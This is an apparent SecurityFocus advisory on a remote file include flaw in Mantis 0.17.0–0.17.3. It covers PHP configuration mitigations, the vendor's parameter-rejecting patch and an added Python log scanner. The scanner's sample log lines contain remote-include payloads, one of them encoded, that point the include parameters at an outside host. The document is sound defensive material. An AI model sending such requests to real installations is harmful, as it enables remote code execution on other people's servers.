
Mantis Configuration Remote File Include Command Execution Vulnerability

Solution:
Exploitation of this and other remote file include issues may be limited by disabling both 'allow_url_fopen' and 'register_globals' in the local site PHP configuration.

This issue has been addressed in Mantis 0.17.4 and later.

The vendor has announced that if an upgrade cannot be applied, the vulnerability can be addressed by inserting the following lines in core_API.php:

// Vendor workaround: abort the request if any input source (GET, POST or cookie)
// attempts to supply one of the include-path settings. With register_globals
// enabled, PHP would otherwise promote such a parameter into the matching
// $g_* configuration variable before it is used in an include.
if ( isset($HTTP_GET_VARS['g_top_include_file']) ||
     isset($HTTP_POST_VARS['g_top_include_file']) ||
     isset($HTTP_COOKIE_VARS['g_top_include_file']) ) {
    exit;
}

if ( isset($HTTP_GET_VARS['g_bottom_include_page']) ||
     isset($HTTP_POST_VARS['g_bottom_include_page']) ||
     isset($HTTP_COOKIE_VARS['g_bottom_include_page']) ) {
    exit;
}

if ( isset($HTTP_GET_VARS['g_css_include_file']) ||
     isset($HTTP_POST_VARS['g_css_include_file']) ||
     isset($HTTP_COOKIE_VARS['g_css_include_file']) ) {
    exit;
}

if ( isset($HTTP_GET_VARS['g_meta_include_file']) ||
     isset($HTTP_POST_VARS['g_meta_include_file']) ||
     isset($HTTP_COOKIE_VARS['g_meta_include_file']) ) {
    exit;
}
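The vendor workaround rejects four request parameters. As an added example (not code from the advisory or from the Mantis project), the following Python scan checks web server access-log requests for any of those parameter names and rates URL-valued ones higher, since those are the remote-include attempts that an enabled allow_url_fopen would honour. The log lines are constructed for the example; the log format and the severity labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request parameters the vendor workaround rejects (names taken from the advisory).
MANTIS_INCLUDE_PARAMS = {
    "g_top_include_file", "g_bottom_include_page",
    "g_css_include_file", "g_meta_include_file",
}

# A value naming a remote resource; with allow_url_fopen enabled PHP would fetch it.
REMOTE_WRAPPER = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines in Apache combined-log style (not from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jan/2008:10:00:01 +0000] "GET /mantis/view_bug_page.php?f_id=5 HTTP/1.1" 200 4321
192.0.2.20 - - [10/Jan/2008:10:00:02 +0000] "GET /mantis/index.php?g_top_include_file=http://203.0.113.5/x.txt HTTP/1.1" 200 512
192.0.2.30 - - [10/Jan/2008:10:00:03 +0000] "GET /mantis/index.php?g_css_include_file=%68ttp%3A%2F%2F203.0.113.5%2Fs.txt HTTP/1.1" 200 512
192.0.2.40 - - [10/Jan/2008:10:00:04 +0000] "GET /mantis/index.php?g_meta_include_file=local.php HTTP/1.1" 200 512
"""

# source, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_request(url):
    """Return (param, value, remote) for the first rejected parameter in the query, else None."""
    query = urlsplit(url).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in MANTIS_INCLUDE_PARAMS:
            value = unquote(values[0])  # decode once more to catch double-encoded values
            return name, value, bool(REMOTE_WRAPPER.match(value))
    return None

def scan_log(text):
    """Return one alert dict per logged request that carries a rejected parameter."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, ts, method, url, status = m.groups()
        hit = classify_request(url)
        if hit:
            param, value, remote = hit
            alerts.append({"src": src, "time": ts, "param": param, "value": value,
                           "severity": "high" if remote else "medium", "status": int(status)})
    return alerts
```

Access logs record only the query string, so this catches the GET form; the POST and cookie paths the vendor patch also blocks need application-side logging or a request-inspecting proxy to observe.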


Mantis Mantis 0.17.0
Mantis Mantis 0.17.1
Mantis Mantis 0.17.2
Mantis Mantis 0.17.3

Copyright 2008, SecurityFocus